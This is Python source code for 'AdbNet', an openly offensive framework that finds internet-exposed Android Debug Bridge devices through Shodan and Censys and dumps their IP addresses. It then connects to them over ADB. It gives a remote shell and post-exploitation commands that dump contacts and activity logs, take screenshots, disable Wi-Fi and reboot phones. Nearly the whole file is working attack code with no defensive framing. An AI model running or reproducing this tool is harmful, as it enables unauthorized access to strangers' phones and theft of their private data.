· last year · Jan 15, 2024, 10:25 AM
1try:
2 import os
3 import re
4 import socket
5 import pathlib
6 import requests
7 import subprocess
8 from time import sleep
9 from colorama import Fore
10 from datetime import datetime
11except:
12 print("[-] Error! Make sure you install the required modules!")
13
14
15shodan_key = "" # Add your Shodan API Key here
16api_id = "" # Add your Censys API ID here
17api_secret = "" # Add your Censys API Secret Key here
18
19
20# AdbNet
21# Date: 07/06/21
22# Author: https://github.com/0x1CA3
23
24
25cur = datetime.now()
26clear_screen = lambda: os.system("cls" if os.name == "nt" else "clear")
27current_time = cur.strftime("%m/%d/%Y, %H:%M:%S")
28leave = lambda: exit()
29computer_name = socket.gethostname()
30
31class other():
32 def help_menu():
33 helpmain = f"""
34 {Fore.GREEN}Commands Description
35 {Fore.GREEN}-------- -----------
36 {Fore.RED}help Displays help commands.
37 {Fore.RED}info Lets you retrieve information on a specified device.
38 {Fore.RED}post Loads post-exploitation modules for connected android devices.
39 {Fore.RED}shell Lets you execute a system command.
40 {Fore.RED}banner Displays the banner.
41 {Fore.RED}other Displays other/extra commands.
42 {Fore.RED}clear Clears the screen.
43 {Fore.RED}exit Exits.
44
45 {Fore.GREEN}ADB Options [Remote-Access] Description
46 {Fore.GREEN}----------- -----------
47 {Fore.RED}adb Lets you execute your own custom commands for ADB.
48 {Fore.RED}install Installs ADB if you don't already have it installed.
49 {Fore.RED}connect Lets you connect to a specific device.
50 {Fore.RED}devices Lists the devices YOU are currently connected to.
51 {Fore.RED}command Lets you execute a command without opening a shell.
52 {Fore.RED}terminal Opens up a shell. [Use the 'exit' command to return back to the Framework]
53 {Fore.RED}killall Kills all sessions.
54
55 {Fore.GREEN}Scanner Options Description
56 {Fore.GREEN}--------------- -----------
57 {Fore.RED}scan shodan Uses shodan to search for vulnerable devices. [This is the default scanner]
58 {Fore.RED}scan censy Uses censys to search for vulnerable devices.
59 """
60 print(helpmain)
61
62 def banner():
63 clear_screen()
64 a = requests.get(f'''https://api.shodan.io/shodan/host/count?key={shodan_key}&query=android+debug+bridge''').text
65 clea = a.replace('''{"matches": [], "total":''', '')
66 cleanr = clea.replace('''}''', '')
67 banr = f"""
68 {Fore.RED} ▄▄▄ ▓█████▄ ▄▄▄▄ ███▄ █ ▓█████▄▄▄█████▓ {Fore.GREEN}[+] Logged in as: {computer_name}
69 {Fore.RED}▒████▄ ▒██▀ ██▌▓█████▄ ██ ▀█ █ ▓█ ▀▓ ██▒ ▓▒ {Fore.GREEN}[+] Devices available:{cleanr}
70 {Fore.RED}▒██ ▀█▄ ░██ █▌▒██▒ ▄██ ▓██ ▀█ ██▒▒███ ▒ ▓██░ ▒░ {Fore.GREEN}[+] Time: {current_time}
71 {Fore.RED}░██▄▄▄▄██ ░▓█▄ ▌▒██░█▀ ▓██▒ ▐▌██▒▒▓█ ▄░ ▓██▓ ░ {Fore.GREEN}[+] Made by: https://github.com/0x1CA3
72 {Fore.RED} ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓ ▒██░ ▓██░░▒████▒ ▒██▒ ░ {Fore.GREEN}[+] The most common ports are 5555 and 4444!
73 {Fore.RED} ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒ ░ ▒░ ▒ ▒ ░░ ▒░ ░ ▒ ░░ {Fore.GREEN}[+] Use 'help' or '?' for commands!
74 {Fore.RED} ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░░ ░ ▒░ ░ ░ ░ ░
75 {Fore.RED} ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
76 {Fore.RED} ░ ░ ░ ░ ░ ░ ░
77 {Fore.RED} ░ ░
78 """
79 print(banr)
80
81 def help_other():
82 otherhelp = f"""
83 {Fore.GREEN}Dump Options Description
84 {Fore.GREEN}------------ -----------
85 {Fore.RED}dump shodan Attempts to dump IP addresses of the vulnerable devices. [Shodan]
86 {Fore.RED}dump censy Attempts to dump IP addresses of the vulnerable devices. [Censy]
87 """
88 print(otherhelp)
89
90 def post_help():
91 helppost = f"""
92 [Reminder: Make sure you are already connected to a device! You can check if you are by using the 'devices' command.]
93
94 {Fore.GREEN}Post-Exploitation-Modules Description
95 {Fore.GREEN}------------------------- -----------
96 {Fore.RED}battery Retrieves the devices battery information.
97 {Fore.RED}net_enable Enables Wi-Fi remotely on the device.
98 {Fore.RED}net_disable Disables Wi-Fi remotely on the device.
99 {Fore.RED}screenshot Takes a screenshot remotely on the device.
100 {Fore.RED}reboot Remotely reboots the device.
101 {Fore.RED}dump_contacts Remotely dumps the stored contacts on the device.
102 {Fore.RED}dump_activity Retrieves the phones activity.
103 """
104 print(helppost)
105
106 def terminal():
107 while True:
108 term = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[user@terminal]~# ")
109 if term == "back" or term == "exit": cli()
110 else: os.system(f"{term}")
111
112 def adb_terminal():
113 while True:
114 adb_term = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[user@adb]~# ")
115 if adb_term == "back" or adb_term == "exit": cli()
116 else: os.system(f"adb {adb_term}")
117
118 def fetch_device_ip():
119 os.system("python extra/fetch.py > extra/ip.txt")
120 os.system("python3 extra/fetch.py > extra/ip.txt")
121 fetchipfile = open("extra/ip.txt", "r")
122 datafetch = fetchipfile.readlines()
123 print(f"{Fore.GREEN}[+] Attempting to dump data...")
124 sleep(0.10)
125 for line in datafetch:
126 if "ip_str" or "host" in line:
127 print(f'''{Fore.GREEN}[+] Fetched information!
128 --------------------------------
129 {line}''')
130 else:
131 print(f"{Fore.RED}[-] Error! Could not fetch IP addresses!")
132
133 def censys_scan_device():
134 if os.name == "nt":
135 os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret}''')
136 else:
137 os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret} | jq '.' > extra/data.json''')
138 censydata = open("extra/data.json", "r")
139 datext = censydata.readlines()
140 for line in datext:
141 if "total" in line:
142 cenip = line
143 cenipclean = cenip.replace('''"''', '')
144 cencleanerip = cenipclean.replace(":", '')
145 cenclenfinal = cencleanerip.replace(",", '')
146 censuperipclean = re.sub('[a-z]', '', cenclenfinal)
147 print(f"\n{Fore.GREEN}[+] Devices available: " + censuperipclean)
148
149 def censys_dump_ip():
150 if os.name == "nt":
151 os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret}''')
152 else:
153 os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret} | jq '.' > extra/data.json''')
154 censydata = open("extra/data.json", "r")
155 datext = censydata.readlines()
156 for line in datext:
157 if "ip" in line:
158 cenip1 = line
159 cenipclean1 = cenip1.replace('''"''', '')
160 cencleanerip1 = cenipclean1.replace(":", '')
161 cenclenfinal1 = cencleanerip1.replace(",", '')
162 censuperipclean1 = re.sub('[a-z]', '', cenclenfinal1)
163 print(f"{Fore.GREEN}[+] IP Address dumped! -" + censuperipclean1)
164
165class handler():
166 def __init__(self, command):
167 self.shell = command
168
169 def device_check_shodan():
170 print("Checking devices...")
171 sleep(0.5)
172 a = requests.get(f'''https://api.shodan.io/shodan/host/count?key={shodan_key}&query=android+debug+bridge''').text
173 clean = a.replace('''{"matches": [], "total":''', '')
174 cleaner = clean.replace('''}''', '')
175 print(f"{Fore.GREEN}\n[+]{cleaner} Devices available!\n")
176
177 cmds = \
178 {
179 "help": other.help_menu,
180 "?": other.help_menu,
181 "dump shodan": other.fetch_device_ip,
182 "dump censy": other.censys_dump_ip,
183 "clear": clear_screen,
184 "post": other.post_help,
185 "shell": other.terminal,
186 "scan shodan": device_check_shodan,
187 "scan censy": other.censys_scan_device,
188 "banner": other.banner,
189 "other": other.help_other,
190 "exit": leave,
191 "adb": other.adb_terminal
192 }
193
194 postexp = \
195 {
196 "battery": "adb shell dumpsys battery",
197 "net_enable": "adb shell svc wifi enable",
198 "net_disable": "adb shell svc wifi disable",
199 "screenshot": "adb shell screencap /sdcard/sspwned.png",
200 "reboot": "adb reboot",
201 "dump_contacts": "adb shell content query --uri content://contacts/phones/ --projection display_name:number",
202 "dump_activity": "adb shell dumpsys activity"
203 }
204
205 adb_cmds = \
206 {
207 "install": "sudo apt install adb",
208 "devices": "adb devices",
209 "terminal": "adb shell",
210 "killall": "adb kill-server"
211 }
212
213 def device_information(android_device):
214 print("Fetching information on device...")
215 sleep(0.5)
216 try:
217 b = requests.get(f'''https://api.shodan.io/shodan/host/{android_device}?key={shodan_key}''')
218 print(f"{Fore.GREEN}[+] Information Fetched!")
219 print(b.text)
220 except:
221 print(f"{Fore.RED}[-] Failed to retrieve information about the specified device!")
222
223 def extra_run(self):
224 if self.shell == "info":
225 android_device = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter an IP]~# ")
226 handler.device_information(android_device)
227 elif self.shell == "connect":
228 adb_connect = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter an IP]~# ")
229 adb_port = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter a Port]~# ")
230 print("[+] Starting...")
231 sleep(0.4)
232 os.system(f"adb connect {adb_connect}:{adb_port}")
233 elif self.shell == "command":
234 adb_command = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter a command]~# ")
235 os.system(f"adb shell {adb_command}")
236 else:
237 print(f"{Fore.RED}Error! Command [{self.shell}] was not found!")
238
239 def cmd(self, cmds=cmds, adb_cmds=adb_cmds, postexp=postexp):
240 if self.shell in cmds:
241 try:
242 cmds[self.shell]()
243 except:
244 print(f"{Fore.RED}[-] Failed to properly execute command!")
245 elif self.shell in adb_cmds:
246 try:
247 subprocess.call(adb_cmds[self.shell], shell=True)
248 except:
249 print(f"{Fore.RED}[-] Failed to properly execute command!")
250 elif self.shell in postexp:
251 try:
252 subprocess.call(postexp[self.shell], shell=True)
253 except:
254 print(f"{Fore.RED}[-] Failed to properly execute command!")
255 else:
256 handler.extra_run(self)
257
258def cli():
259 while True:
260 shell = handler(input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[user@adbnet]~# "))
261 shell.cmd()
262
263if __name__ == "__main__":
264 try:
265 other.banner()
266 cli()
267 except KeyboardInterrupt as interrupt:
268 exit(interrupt)